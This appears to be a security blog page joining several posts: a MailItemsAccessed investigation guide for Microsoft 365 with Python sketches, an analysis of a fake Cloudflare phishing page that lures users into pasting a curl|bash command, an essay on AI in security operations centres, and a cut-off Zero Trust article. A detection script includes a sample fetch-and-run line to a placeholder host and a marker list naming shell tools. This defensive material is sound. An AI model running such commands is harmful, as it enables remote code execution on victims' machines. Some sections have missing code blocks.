Audit (Standard): default retention 180 days (previously 90).

Audit (Premium): longer retention (e.g., 365 days or more), enriched logs.

Confirm that your license level supports the MailItemsAccessed event. Many sources state this requires Audit Premium or an E5-level compliance add-on.

Confirm mailbox auditing is on by default for user mailboxes. Microsoft states this for Exchange Online.

Confirm that MailItemsAccessed is part of the default audit set (or if custom audit sets exist, that it’s included). According to Microsoft documentation: the MailItemsAccessed action “covers all mail protocols … and is enabled by default for users assigned an Office 365 E3/E5 or Microsoft 365 E3/E5 licence.”

For tenants with customised audit sets, ensure the Microsoft defaults are re-applied so that MailItemsAccessed isn’t inadvertently removed.

Record what your current audit-log retention policy is (e.g., 180 days vs 365 days) so you know how far back you can search.

Establish a baseline volume of MailItemsAccessed events—how many are generated from normal activity. That helps define thresholds for abnormal behaviour during investigation.
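One way to turn a baseline into a working threshold is sketched below. It assumes you have already reduced an audit export to a count of MailItemsAccessed events per day for one mailbox; the function names, the `k` multiplier, and the sample numbers are illustrative assumptions, not Microsoft guidance.

```python
from statistics import mean, pstdev

def baseline_threshold(daily_counts, k=3.0):
    """Return mean + k * population standard deviation of the daily counts."""
    if not daily_counts:
        raise ValueError("need at least one day of baseline data")
    return mean(daily_counts) + k * pstdev(daily_counts)

def abnormal_days(counts_by_day, threshold):
    """Return the days (sorted) whose event count exceeds the threshold."""
    return sorted(day for day, n in counts_by_day.items() if n > threshold)

# Hypothetical baseline week for one mailbox (events per day).
baseline = [40, 55, 38, 61, 47, 12, 9]
limit = baseline_threshold(baseline)

# Hypothetical counts from the suspected incident window.
incident_window = {"2025-03-03": 52, "2025-03-04": 890, "2025-03-05": 44}
flagged = abnormal_days(incident_window, limit)
```

A mean-plus-deviation rule is only one choice; mailboxes with very spiky normal usage may need a percentile-based limit instead.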

Once an incident is underway and you have suspected mailboxes, follow structured investigation steps.

From your alarm sources (e.g., anomalous sign-in alerts, inbound or outbound rule creation, unusual inbox rules, compromised credentials) compile a list of mailboxes that might have been accessed.

In the Purview portal → Audit → filter for Activity = MailItemsAccessed, specifying the time range that covers suspected attacker dwell time.

Export the results to CSV via the Unified Audit Log.

Group the MailItemsAccessed results by key session indicators:

ClientIP

SessionId

UserAgent / ClientInfoString

Flag sessions that show:

Unknown or non-corporate IP addresses (e.g., external ASN)

Legacy protocols (IMAP, POP, ActiveSync) or bulk-sync behaviour

User agents indicating automated tooling or scripting

Count distinct ItemIds and FolderPaths to determine how many items and which folders were accessed.

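Look for throttling indicators: for example, more than ~1,000 MailItemsAccessed events in 24 hours for a single mailbox may indicate scripted or bulk access. Exchange Online also throttles MailItemsAccessed logging for a mailbox past roughly that volume, so records for a throttled period may be incomplete.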
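The grouping and flagging steps above can be sketched in a few lines of Python. This is a minimal illustration that assumes each exported record has already been flattened into one row per accessed item, using the field names from this article (`ClientIP`, `SessionId`, `UserAgent`, `ItemId`, `FolderPath`); the real export nests these values differently, and the sample rows, client strings, and marker list are made up.

```python
from collections import defaultdict

def summarise_sessions(rows):
    """Group rows by (ClientIP, SessionId, UserAgent) and count what each session touched."""
    grouped = defaultdict(lambda: {"events": 0, "items": set(), "folders": set()})
    for row in rows:
        key = (row["ClientIP"], row["SessionId"], row["UserAgent"])
        grouped[key]["events"] += 1
        grouped[key]["items"].add(row["ItemId"])
        grouped[key]["folders"].add(row["FolderPath"])
    return {
        key: {
            "events": stats["events"],
            "distinct_items": len(stats["items"]),
            "folders": sorted(stats["folders"]),
        }
        for key, stats in grouped.items()
    }

def flag_sessions(summary, corporate_ips, legacy_markers=("imap", "pop3", "activesync")):
    """Return {session key: [reasons]} for sessions matching the red flags."""
    flagged = {}
    for key in summary:
        ip, _session_id, agent = key
        reasons = []
        if ip not in corporate_ips:
            reasons.append("non-corporate IP")
        if any(marker in agent.lower() for marker in legacy_markers):
            reasons.append("legacy protocol")
        if reasons:
            flagged[key] = reasons
    return flagged

# Hypothetical flattened rows (documentation-range IP addresses).
rows = [
    {"ClientIP": "198.51.100.7", "SessionId": "s-1", "UserAgent": "Client=OWA", "ItemId": "A", "FolderPath": "\\Inbox"},
    {"ClientIP": "198.51.100.7", "SessionId": "s-1", "UserAgent": "Client=OWA", "ItemId": "A", "FolderPath": "\\Inbox"},
    {"ClientIP": "203.0.113.50", "SessionId": "s-2", "UserAgent": "Client=IMAP4", "ItemId": "B", "FolderPath": "\\Inbox"},
    {"ClientIP": "203.0.113.50", "SessionId": "s-2", "UserAgent": "Client=IMAP4", "ItemId": "C", "FolderPath": "\\Sent Items"},
]
summary = summarise_sessions(rows)
flags = flag_sessions(summary, corporate_ips={"198.51.100.7"})
```

Substring matching on the client string is crude; treat a flag as a prompt to look closer, not as a finding.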

Use the example KQL queries below (see Section “KQL Example Snippets”).

Overlay these results with Send audit events and InboxRule/New-InboxRule events to detect lateral-phish, rule-based fraud or data-staging behaviour.

For example, access events followed by mass sends indicate the attacker may have read mail and then exfiltrated it or used the account for fraud.
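A rough way to test for that read-then-send pattern is to look for Send events that closely follow a burst of access events on the same mailbox. The sketch below assumes you have already extracted two lists of timestamps for one mailbox; the 30-minute window and the minimum of five reads are arbitrary assumptions to tune against your baseline.

```python
from datetime import datetime, timedelta

def sends_following_access(access_times, send_times,
                           window=timedelta(minutes=30), min_access=5):
    """Return (send_time, access_count) for sends preceded by a burst of access events."""
    hits = []
    for sent in sorted(send_times):
        # Count access events in the window that ends at this send.
        preceding = sum(1 for t in access_times if sent - window <= t <= sent)
        if preceding >= min_access:
            hits.append((sent, preceding))
    return hits

# Hypothetical timeline: six reads between 09:00 and 09:05, then two sends.
start = datetime(2025, 3, 4, 9, 0)
access = [start + timedelta(minutes=m) for m in range(6)]
sends = [start + timedelta(minutes=10), start + timedelta(hours=5)]
hits = sends_following_access(access, sends)
```

Here only the 09:10 send is returned, because the later send has no access activity in the preceding half hour.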

Check the client protocol used by the session. If the client is REST API, bulk sync or legacy protocol, that may indicate the attacker is exfiltrating rather than simply reading.

If MailItemsAccessed shows items accessed using a legacy IMAP/POP or ActiveSync session — that is a red flag for mass download.

Once raw data is collected, move into analysis to scope the incident.

Combine sign-in logs (from Microsoft Entra ID Sign‑in Logs) with MailItemsAccessed events to reconstruct dwell time and sequence.

Determine when the attacker first gained access, how long they stayed, and when they left.
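Once sign-in and mailbox events are keyed to the attacker's known IP addresses, the dwell window is simple arithmetic. This sketch assumes both sources have been normalised into dictionaries with hypothetical `time` and `ip` keys; real sign-in and audit records use different field names.

```python
from datetime import datetime
from itertools import chain

def dwell_window(signins, mail_events, attacker_ips):
    """Return first seen, last seen and dwell duration across both log sources."""
    times = sorted(
        event["time"]
        for event in chain(signins, mail_events)
        if event["ip"] in attacker_ips
    )
    if not times:
        return None  # no evidence tied to these IPs
    return {"first_seen": times[0], "last_seen": times[-1], "dwell": times[-1] - times[0]}

# Hypothetical normalised events.
signins = [
    {"time": datetime(2025, 3, 4, 8, 55), "ip": "203.0.113.50"},
    {"time": datetime(2025, 3, 4, 9, 30), "ip": "198.51.100.7"},
]
mail_events = [
    {"time": datetime(2025, 3, 4, 9, 0), "ip": "203.0.113.50"},
    {"time": datetime(2025, 3, 6, 17, 20), "ip": "203.0.113.50"},
]
window = dwell_window(signins, mail_events, attacker_ips={"203.0.113.50"})
```

The result is a lower bound: it only covers activity from IPs you have already attributed to the attacker.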

Deliver an itemised summary (folder path, count of items, timestamps) of mailbox items accessed.

Limit exposure claims to the items you have logged evidence for — do not assume access of the entire mailbox unless logs show it (or you have other forensic evidence).
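An itemised summary of this kind can be produced directly from the malicious session's rows. The sketch assumes flattened rows with hypothetical `FolderPath`, `ItemId`, and `Time` keys, and it reports only what the rows contain, in keeping with the evidence-only rule above.

```python
from datetime import datetime

def folder_exposure(rows):
    """Summarise logged access per folder: distinct items plus first and last access time."""
    report = {}
    for row in rows:
        entry = report.setdefault(
            row["FolderPath"],
            {"items": set(), "first": row["Time"], "last": row["Time"]},
        )
        entry["items"].add(row["ItemId"])
        entry["first"] = min(entry["first"], row["Time"])
        entry["last"] = max(entry["last"], row["Time"])
    return [
        {"folder": folder, "distinct_items": len(e["items"]), "first": e["first"], "last": e["last"]}
        for folder, e in sorted(report.items())
    ]

# Hypothetical rows from one attacker session.
session_rows = [
    {"FolderPath": "\\Inbox", "ItemId": "A", "Time": datetime(2025, 3, 4, 9, 0)},
    {"FolderPath": "\\Inbox", "ItemId": "B", "Time": datetime(2025, 3, 4, 9, 2)},
    {"FolderPath": "\\Inbox", "ItemId": "A", "Time": datetime(2025, 3, 4, 9, 5)},
    {"FolderPath": "\\Finance", "ItemId": "C", "Time": datetime(2025, 3, 4, 9, 3)},
]
exposure = folder_exposure(session_rows)
```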

If you see unusually high-volume access plus a spike in Send events or inbox rule changes, automated or bulk access is the likely explanation. Report it as an inference unless session data (protocol, user agent, timing) confirms it.

Document IOCs (client IPs, session IDs, user-agent strings) tied to the malicious session.

After the investigation, report your findings and validate control gaps.

Your report should document:

Tenant license type and retention (Audit Standard vs Premium)

Audit coverage verification (mailbox auditing enabled, MailItemsAccessed present)

Affected item count, folder paths, session data (IPs, protocol, timeframe)

Indicators of compromise (IOCs) and signs of mass or scripted access

Be transparent about limitations:

Upgrading to Audit Premium mid-incident will not backfill missing MailItemsAccessed data for the earlier period. Sources note this gap.

If mailbox auditing or default audit-sets were customised (and MailItemsAccessed omitted), you may lack full visibility. Example commentary notes this risk.

Maintain Audit Premium licensing for at-risk tenants (e.g., high-value executive mailboxes or those handling sensitive data).

Pre-stage KQL dashboards to detect anomalies (e.g., bursts of MailItemsAccessed, high counts per hour or per day) so you don’t rely solely on ad-hoc searches.
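The same burst logic can be prototyped outside a dashboard before you commit to a query. The sketch below buckets events by user and clock hour and reports any bucket above a fixed limit; the `(user, timestamp)` input shape, the mailbox name, and the limit of 100 are assumptions for illustration.

```python
from collections import Counter
from datetime import datetime, timedelta

def hourly_bursts(events, per_hour_limit):
    """Return (user, hour, count) for every user-hour bucket above the limit."""
    buckets = Counter(
        (user, ts.replace(minute=0, second=0, microsecond=0)) for user, ts in events
    )
    return sorted(
        (user, hour, n) for (user, hour), n in buckets.items() if n > per_hour_limit
    )

# Hypothetical data: 200 events in the 02:00 hour, then 5 events six hours later.
base = datetime(2025, 3, 4, 2, 0)
events = [("cfo@example.com", base + timedelta(seconds=10 * i)) for i in range(200)]
events += [("cfo@example.com", base + timedelta(hours=6, minutes=i)) for i in range(5)]
bursts = hourly_bursts(events, per_hour_limit=100)
```

Fixed clock-hour buckets can split a burst across two hours; a sliding window is more sensitive if that matters for your thresholds.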

Include audit-configuration verification (licensing, mailbox audit set, retention) in your regular vCISO or governance audit cadence.

| Tactic | Technique | ID |
|---|---|---|
| Collection | Email Collection: Remote Email Collection | T1114.002 |
| Exfiltration | Exfiltration Over Web Service | T1567 |
| Discovery | Cloud Service Discovery | T1526 |
| Defense Evasion | Valid Accounts: Cloud Accounts | T1078.004 |

These mappings illustrate how MailItemsAccessed visibility ties directly into attacker-behaviour frameworks in cloud email contexts.

Verify Purview Audit plan and retention

Validate MailItemsAccessed events present/searchable for a sample of users

Ensure mailbox auditing defaults (default audit-set) restored and active

Pre-stage anomaly detection queries / dashboards for mailbox-access bursts

When investigating a BEC incident, possession of high-fidelity audit data like MailItemsAccessed transforms your investigation from guesswork into evidence-driven clarity. The key is readiness: licence appropriately, validate your coverage, establish baselines, and when a breach occurs follow a structured workflow from extraction to scoping to reporting. Without that groundwork your post-incident forensics may hit blind spots. But with it you increase your odds of confidently quantifying exposure, attributing access and closing the loop.

Prepare, detect, dissect—repeatably.

Microsoft Learn: Manage mailbox auditing – “Mailbox audit logging is turned on by default in all organizations.”

Microsoft Learn: Use MailItemsAccessed to investigate compromised accounts – “The MailItemsAccessed action … is enabled by default for users that are assigned an Office 365 E3/E5 or Microsoft 365 E3/E5 license.”

Microsoft Learn: Auditing solutions in Microsoft Purview – licensing and search prerequisites.

Office365ITPros: Enable MailItemsAccessed event for Exchange Online – “Purview Audit Premium is included in Office 365 E5 and … Audit (Standard) is available to E3 customers.”

TrustedSec blog: MailItemsAccessed woes – “According to Microsoft, this event is only accessible if you have the Microsoft Purview Audit (Premium) functionality.”

Practical365: Microsoft’s slow delivery of MailItemsAccessed audit event – retention commentary.

O365Info: Manage audit log retention policies – up to 10 years for Premium.

Office365ITPros: Mailbox audit event ingestion issues for E3 users.

RedCanary blog: Entra ID service principals and BEC – “MailItemsAccessed is a very high volume record …”




Over the years, phishing campaigns have evolved from crude HTML forms to shockingly convincing impersonations of the web infrastructure we rely on every day. The latest example Adam spotted is a masterclass in deception—and a case study in what it looks like when phishing meets full-stack engineering.

Let’s break it down.

The page loads innocuously. A user stumbles upon what appears to be a familiar Cloudflare “Just a moment…” screen. If you’ve ever browsed the internet behind any semblance of WAF protection, you’ve seen the tell-tale page hundreds of times. Except this one isn’t coming from Cloudflare. It’s fake. Every part of it.

Behind the scenes, the JavaScript executes a brutal move: it stops the current page (window.stop()), wipes the DOM clean, and replaces it with a base64-decoded HTML iframe that mimics Cloudflare’s Turnstile challenge interface. It spoofs your current host into the title bar and dynamically injects the fake content.

A very neat trick—if it weren’t malicious.

Once the interface loads, it identifies your OS—at least it pretends to. In truth, the script always forces "mac" as the user’s OS regardless of reality. Why? Because the rest of the social engineering depends on that.

It shows terminal instructions and prominently displays a “Copy” button.

The payload?

Let that sink in. This isn’t just phishing. This is copy-paste remote code execution. It doesn’t ask for credentials. It doesn’t need a login form. It needs you to paste and hit enter. And if you do, it installs something persistent in the background—likely a beacon, loader, or dropper.

The page hides its maliciousness through layers of base64 obfuscation. It forgoes any network indicators until the moment the user executes the command. Even then, the site returns an HTTP 418 (“I’m a teapot”) when fetched via typical tooling like curl. Likely, it expects specific headers or browser behavior.

Notably:

Impersonates Cloudflare Turnstile UI with shocking visual fidelity.

Forces macOS instructions regardless of the actual user agent.

Abuses clipboard to encourage execution of the curl|bash combo.

Uses base64 to hide the entire UI and payload.

Drops via backgrounded nohup shell execution.
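Those traits suggest a rough static check for analysts who have saved a copy of a suspect page: find long base64 runs, decode them, and look for tell-tale strings. This is a minimal sketch, not a detection rule; the 40-character cut-off, the marker list, and the sample page are assumptions, and a page using a different encoding will pass untouched.

```python
import base64
import binascii
import re

# Runs of 40+ base64 characters; the length cut-off is an arbitrary assumption.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}")
# Lower-case strings worth flagging once decoded; illustrative, not exhaustive.
MARKERS = ("<iframe", "curl ", "| bash", "nohup")

def decode_run(run):
    """Best-effort decode of a base64 run; returns '' if it cannot be decoded."""
    if len(run) % 4 == 1:          # a length of 4n+1 is never valid base64
        run = run[:-1]
    run += "=" * (-len(run) % 4)   # restore padding the regex does not capture
    try:
        return base64.b64decode(run).decode("utf-8", errors="ignore")
    except (binascii.Error, ValueError):
        return ""

def suspicious_base64(page_source):
    """Return (offset, matched markers) for each run that decodes to something alarming."""
    findings = []
    for match in B64_RUN.finditer(page_source):
        decoded = decode_run(match.group(0)).lower()
        hits = [m for m in MARKERS if m in decoded]
        if hits:
            findings.append((match.start(), hits))
    return findings

# Hypothetical page that hides an iframe and a shell one-liner behind atob().
payload = '<iframe srcdoc="verify"></iframe><code>curl -s https://example.invalid/i | bash</code>'
page = 'document.body.innerHTML = atob("' + base64.b64encode(payload.encode()).decode() + '");'
found = suspicious_base64(page)
```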

If a user copied and ran the payload, immediate action is necessary. Disconnect the device from the network and begin triage:

Kill live processes:

Inspect for signs of persistence:

Review shell history and nohup output:

If you find dropped binaries, reimage the host unless you can verify system integrity end-to-end.
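For the persistence check, one starting point is to list files changed recently in the standard macOS launchd directories. The sketch below does only that; the directory list and the 24-hour look-back are assumptions, and attackers can persist elsewhere (cron, login items, shell profiles), so an empty result is inconclusive.

```python
import time
from pathlib import Path

# Standard per-user and system-wide launchd locations on macOS.
LAUNCHD_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]

def recently_modified(directories, max_age_seconds=24 * 3600, now=None):
    """Return files in the given directories modified within the look-back period."""
    now = time.time() if now is None else now
    hits = []
    for directory in directories:
        directory = Path(directory)
        if not directory.is_dir():
            continue  # skip locations that do not exist on this host
        for entry in directory.iterdir():
            try:
                modified = entry.stat().st_mtime
            except OSError:
                continue  # unreadable entry; skip rather than abort triage
            if entry.is_file() and now - modified <= max_age_seconds:
                hits.append(entry)
    return sorted(hits)
```

Calling `recently_modified(LAUNCHD_DIRS)` on the affected host returns the candidate files to inspect by hand. Modification times can be forged, so use this to prioritise review, not to clear a machine.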

This isn’t the old “email + attachment” phishing game. This is trust abuse on a deeper level. It hijacks visual cues, platform indicators, and operating assumptions about services like Cloudflare. It tricks users not with malware attachments, but with shell copy-pasta. That’s a much harder thing to detect—and a much easier thing to execute for attackers.

Train your users not just to avoid shady emails, but to treat curl | bash from the internet as radioactive. No “validation badge” or CAPTCHA-looking widget should ever ask you to run terminal commands.

This is one of the most clever phishing attacks I’ve seen lately—and a chilling sign of where things are headed.

Stay safe out there.


Introduction

We live in a world of accelerating change, and nowhere is that more evident than in cybersecurity operations. Enterprises are rushing to adopt AI and automation technologies in their security operations centres (SOCs) to reduce mean time to detect (MTTD), enhance threat hunting, reduce alert fatigue, and generally eke out more value from scarce resources. But in parallel, adversaries (whether financially motivated cybercriminal gangs, nation‑states, or hacktivists) are themselves adopting, and in some cases advancing, these same enabling technologies. The result: a moving target, one where the advantage is fleeting unless defenders recognise the full implications, adapt processes and governance, and invest in human‑machine partnerships rather than simply tool acquisition.

In this post I’ll explore the attacker/defender dynamics around AI/automation, technology adoption challenges, governance and ethics, how to prioritise automation versus human judgement, and finally propose a roadmap for integrating AI/automation into your SOC with realistic expectations and process discipline.

The basic story is: defenders are trying to adopt AI/automation, but threat actors are often moving faster, or in some cases have fewer constraints, and thus are gaining asymmetric advantages.

Put plainly: attackers are weaponising AI/automation as part of their toolkit (for reconnaissance, social engineering, malware development, evasion) and defenders are scrambling to catch up. Some of the specific offensive uses: AI to craft highly‑persuasive phishing emails, to generate deep‑fake audio or video assets, to automate vulnerability discovery and exploitation at scale, to support lateral movement and credential stuffing campaigns.

For defenders, AI/automation promises faster detection, richer context, reduction of manual drudge work, and the ability to scale limited human resources. But the pace of adoption, the maturity of process, the governance and skills gaps, and the need to integrate these into a human‑machine teaming model mean that many organisations are still in the early innings. In short: the arms race is on, and we’re behind.

As organisations swallow the promise of AI/automation, they often underestimate the foundational requirements. Here are three big challenge areas:

a) Data

AI and ML need clean, well‑structured data. Many security operations environments are plagued with siloed data, alert overload, inconsistent taxonomy, missing labels, and legacy tooling. Without good data, AI becomes garbage‑in/garbage‑out.

Attackers, on the other hand, are using publicly available models, third‑party tools and malicious automation pipelines that require far less polish—so they have a head start.

b) Skills and Trust

Deploying an AI‑powered security tool is only part of the solution. Tuning the models, understanding their outputs, incorporating them into workflows, and trusting them requires skilled personnel. Many SOC teams simply don’t yet have those resources.

Trust is another factor: model explainability, bias, false positives/negatives, adversarial manipulation of models—all of these undermine operator confidence.

c) Process Change vs Tool Acquisition

Too many organisations acquire “AI powered” tools but leave underlying processes, workflows, roles and responsibilities unchanged. The tool then becomes a silo‑in‑a‑box rather than a transformational capability.

Without adjusted processes, organisations can end up with “alert‑spam on steroids” or AI acting as a black box forcing humans to babysit again.

In short: People and process matter at least as much as technology.

Deploying AI and automation in cyber defence doesn’t simply raise technical questions — it raises governance and ethics questions.

Organisations need to define who is accountable for AI‑driven decisions (for example a model autonomously taking containment action), how they audit and validate AI output, how they respond if the model is attacked or manipulated, and how they ensure human oversight.

Ethical issues include: (i) making sure model biases don’t produce blind spots or misclassifications; (ii) protecting privacy when feeding data into ML systems; (iii) understanding that attackers may exploit the same models or our systems’ dependence on them; and (iv) ensuring transparency where human decision‑makers remain in the loop.

A governance framework should address model lifecycle (training, validation, monitoring, decommissioning), adversarial threat modeling (how might the model itself be attacked), and human‑machine teaming protocols (when does automation act, when do humans intervene).

One of the biggest questions in SOC evolution is: how do we draw the line between automation/AI and human judgment? The answer: there is no single line — the optimal state is human‑machine collaboration, with clearly defined tasks for each.

Automation‑first for repetitive, high‑volume, well‑defined tasks: For example, triage of alerts, enrichment of IOCs/IOAs (indicators of compromise and indicators of attack), initial containment steps, known‑pattern detection. AI can accelerate these tasks, free up human time, and reduce mean time to respond.

Humans for context, nuance, strategy, escalation: Humans bring judgement, business context, threat‑scenario understanding, adversary insight, ethics, and the ability to handle novel or ambiguous situations.

Define escalation thresholds: Automation should act on its own only when model confidence meets or exceeds a defined level for that action; anything below the threshold should escalate to a human analyst.

Continuous feedback loop: Human analysts must feed back into model tuning, rules updates, and process improvement — treating automation as a living capability, not a “set‑and‑forget” installation.

Avoid over‑automation risks: Automating without oversight can lead to automation‑driven errors, cascading actions, or missing the adversary‑innovation edge. Also, if you automate everything, you risk deskilling your human team.
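The escalation-threshold idea can be expressed as a small routing rule. This is a sketch under stated assumptions: the action names, the per-action thresholds, and the `Alert` shape are hypothetical, and a real SOAR platform will have its own way to express the same policy.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Alert:
    alert_id: str
    proposed_action: str
    confidence: float  # model confidence in the range 0.0 to 1.0

# Hypothetical thresholds: the more disruptive the action, the more confidence required.
THRESHOLDS = {"enrich": 0.0, "quarantine_email": 0.80, "isolate_host": 0.95}

def route(alert, thresholds=THRESHOLDS):
    """Automate only known actions at or above their threshold; otherwise escalate."""
    threshold = thresholds.get(alert.proposed_action)
    if threshold is None or alert.confidence < threshold:
        return "escalate_to_analyst"
    return "automate"

decisions = [
    route(Alert("a1", "isolate_host", 0.97)),
    route(Alert("a2", "isolate_host", 0.90)),
    route(Alert("a3", "wipe_disk", 0.99)),   # action not in the table
]
```

Escalating unknown actions by default keeps a misconfigured or manipulated model from triggering something nobody approved for automation.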

The right blend depends on your maturity, your toolset, your threat profile, and your risk appetite — but the underlying principle is: automation should augment humans, not replace them.

Assess your maturity and readiness

Define use‑cases with business value

Build foundation: data, tooling, skills

Pilot, iterate, scale

Embed human‑machine teaming and continuous improvement

Maintain governance, ethics and risk oversight

Stay ahead of the adversary

(See main post above for in-depth detail on each step.)

The fundamental truth is this: when defenders pause, attackers surge. The race between automation and AI in cyber defence is no longer about if, but about how fast and how well. Threat actors are not waiting for your slow adoption cycles—they are already leveraging automation and generative AI to scale reconnaissance, craft phishing campaigns, evade detection, and exploit vulnerabilities at speed and volume. Your organisation must not only adopt AI/automation, but adopt it with the right foundation, the right process, the right governance and the right human‑machine teaming mindset.

At MicroSolved we specialise in helping organisations bridge the gap between technological promise and operational reality. If you’re a CISO, SOC manager or security‑operations leader who wants to –

understand how your data, processes and people stack up for AI/automation readiness

prioritise use‑cases that drive business value rather than hype

design human‑machine workflows that maximise SOC impact

embed governance, ethics and adversarial AI awareness

stay ahead of threat actors who are already using automation as a wedge into your environment

… then we’d welcome a conversation. Reach out to us today at info@microsolved.com or call +1.614.351.1237 and let’s discuss how we can help you move from reactive to resilient, from catching up to keeping ahead.

Thanks for reading. Be safe, be vigilant—and let’s make sure the advantage stays with the good guys.

ISC2 AI Adoption Pulse Survey 2025

IBM X-Force Threat Intelligence Index 2025

Accenture State of Cybersecurity Resilience 2025

Cisco 2025 Cybersecurity Readiness Index

Darktrace State of AI Cybersecurity Report 2025

World Economic Forum: Artificial Intelligence and Cybersecurity Report 2025


In an era of dissolved perimeters and sophisticated threats, the traditional “trust but verify” security model is obsolete. The rise of distributed workforces and complex cloud environments has rendered castle-and-moat defenses ineffective, making a new mandate clear: Zero Trust. This security framework operates on a simple yet powerful principle: never trust, always verify. It assumes that threats can originate from anywhere, both inside and outside the network, and demands that no user or device be granted access until their identity and context are rigorously validated.

The modern enterprise no longer has a single, defensible perimeter. Data and applications are scattered across on-premises data centers, multiple cloud platforms, and countless endpoints. This new reality is a goldmine for attackers, who exploit implicit trust within networks to move laterally and escalate privileges. This is compounded by the challenges of remote work; research from Chanty shows that 76% of cybersecurity professionals believe their organization is more vulnerable to cyberattacks because of it. A Zero Trust security model directly confronts this reality by treating every access request as a potential threat, enforcing strict identity verification and least-privilege access for every user and device, regardless of location.

Adopting a Zero Trust framework is not a minor adjustment—it is a fundamental transformation of an organization’s security posture. While the benefits are immense, the path to implementation is fraught with potential pitfalls. A misstep can do more than just delay progress; it can create new security gaps, disrupt business operations, and waste significant investment. Getting it right requires a strategic, holistic approach. Understanding the most common and critical implementation blunders is the first step toward building a resilient and effective Zero Trust architecture that truly protects an organization’s most valuable assets.

One of the most pervasive and damaging misconceptions is viewing Zero Trust as a single technology or a suite of products that can be purchased and deployed. This fundamentally misunderstands its nature and sets the stage for inevitable failure.

Many vendors market their solutions as “Zero Trust in a box,” leading organizations to believe that buying a specific firewall, identity management tool, or endpoint agent will achieve a Zero Trust posture. This product-centric view ignores the interconnectedness of users, devices, applications, and data. No single vendor or tool can address the full spectrum of a Zero Trust architecture. This approach often results in a collection of siloed security tools that fail to communicate, leaving critical gaps in visibility and enforcement.

True Zero Trust is a strategic framework and a security philosophy that must be woven into the fabric of the organization. It requires a comprehensive vision that aligns security policies with business objectives. This Zero Trust strategy must define how the organization will manage identity, secure devices, control access to applications and networks, and protect data. It is an ongoing process of continuous verification and refinement, not a one-time project with a clear finish line.

To avoid this blunder, organizations must begin with strategy, not technology. Form a cross-functional team including IT, security, networking, and business leaders to develop a phased roadmap. This plan should start by defining the most critical assets and data to protect—the “protect surface.” From there, map transaction flows, architect a Zero Trust environment, and create dynamic security policies. This strategic foundation ensures that technology purchases serve the overarching goals, rather than dictating them.

A core principle of Zero Trust is that you cannot protect what you do not know exists. Many implementation efforts falter because they are built on an incomplete or inaccurate understanding of the IT environment. Diving into policy creation without a complete asset inventory is like trying to secure a building without knowing how many doors and windows it has.

Organizations often have significant blind spots in their IT landscape. Shadow IT, forgotten legacy systems, unmanaged devices, and transient cloud workloads create a vast and often invisible attack surface. Without a comprehensive inventory of all assets—including users, devices, applications, networks, and data—it’s impossible to apply consistent security policies. Attackers thrive on these “unknown unknowns,” using them as entry points to bypass security controls.

The scope of a modern enterprise network extends far beyond the traditional office. It encompasses multi-cloud environments, SaaS applications, IoT devices, and API-driven workloads. Underestimating this complexity is a common mistake. A Zero Trust strategy must account for every interconnected component. Failing to discover and map dependencies between these workloads can lead to policies that either break critical business processes or leave significant security vulnerabilities open for exploitation.

The solution is to make comprehensive discovery and inventory the non-negotiable first step. Implement automated tools that can continuously scan the environment to identify and classify every asset. This is not a one-time task; it must be an ongoing process of asset management. This complete and dynamic inventory serves as the foundational data source for building effective network segmentation, crafting granular access control policies, and ensuring the Zero Trust architecture covers the entire digital estate.

For decades, many organizations have operated on flat, highly permissive internal networks. Once an attacker breaches the perimeter, they can often move laterally with ease. Zero Trust dismantles this outdated model by assuming a breach is inevitable and focusing on containing its impact through rigorous network segmentation.

A flat network is an attacker’s playground. After gaining an initial foothold—often through a single compromised device or set of credentials—they can scan the network, discover valuable assets, and escalate privileges without encountering significant barriers. This architectural flaw is responsible for turning minor security incidents into catastrophic data breaches. Relying on perimeter defense alone is a failed strategy in the modern threat landscape.

Micro-segmentation is a core tenet of Zero Trust architecture. It involves dividing the network into small, isolated zones—sometimes down to the individual workload level—and enforcing strict access control policies between them. If one workload is compromised, the breach is contained within its micro-segment, preventing the threat from spreading across the network. This granular control dramatically shrinks the attack surface and limits the blast radius of any security incident.

To implement micro-segmentation effectively, organizations must move beyond legacy VLANs and firewall rules. Utilize modern software-defined networking and identity-based segmentation tools to create dynamic security policies. These policies should enforce the principle of least privilege, ensuring that applications, workloads, and devices can only communicate with the specific resources they absolutely require to function. This approach creates a resilient network where lateral movement is difficult, if not impossible.
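At its core, a least-privilege segmentation policy is a default-deny allow-list of flows. The sketch below shows the shape of that decision; the workload names and ports are hypothetical, and real enforcement happens in the segmentation platform, not in application code.

```python
# Hypothetical allow-list: (source workload, destination workload, destination port).
ALLOWED_FLOWS = frozenset({
    ("web-frontend", "orders-api", 443),
    ("orders-api", "orders-db", 5432),
})

def is_flow_allowed(source, destination, port, allowed=ALLOWED_FLOWS):
    """Default deny: a flow passes only if it is explicitly listed."""
    return (source, destination, port) in allowed

checks = {
    "frontend to api": is_flow_allowed("web-frontend", "orders-api", 443),
    "api to db": is_flow_allowed("orders-api", "orders-db", 5432),
    "frontend to db": is_flow_allowed("web-frontend", "orders-db", 5432),
}
```

The frontend-to-database flow is refused even though each workload is individually trusted, which is exactly the lateral path segmentation is meant to close.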

In a Zero Trust framework, identity is the new perimeter. Since trust is no longer granted based on network location, the ability to robustly authenticate and authorize every user and device becomes the cornerstone of security. Failing to fortify identity management practices is a fatal flaw in any Zero Trust initiative.

Stolen credentials remain a primary vector for major data breaches. Weak passwords, shared accounts, and poorly managed privileged access create easy pathways for attackers. An effective identity management program is essential for mitigating these risks. Without strong authentication mechanisms and strict controls over privileged accounts, an organization’s Zero Trust ambitions will be built on a foundation of sand.

A common mistake is treating authentication as a one-time event at the point of login. This “authenticate once, trust forever” model is antithetical to Zero Trust. A user’s context can change rapidly: they might switch to an unsecure network, their device could become compromised, or their behavior might suddenly deviate from the norm. Static trust models fail to account for this dynamic risk, leaving a window of opportunity for attackers who have hijacked an active session.

A robust Zero Trust strategy requires a mature identity and access management (IAM) program. This includes enforcing strong, phishing-resistant multi-factor authentication (MFA) for all users, implementing a least-privilege access model, and using privileged access management (PAM) solutions to secure administrative accounts. Furthermore, organizations must move toward continuous, risk-based authentication, where access is constantly re-evaluated based on real-time signals like device posture, location, and user behavior.
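Continuous, risk-based authentication boils down to re-scoring each request from current signals and choosing between allow, step-up, and deny. The sketch below illustrates that flow; the signals, weights, and cut-offs are invented for the example and would need calibrating against real data.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class AccessContext:
    device_compliant: bool
    known_location: bool
    behaviour_anomaly: bool
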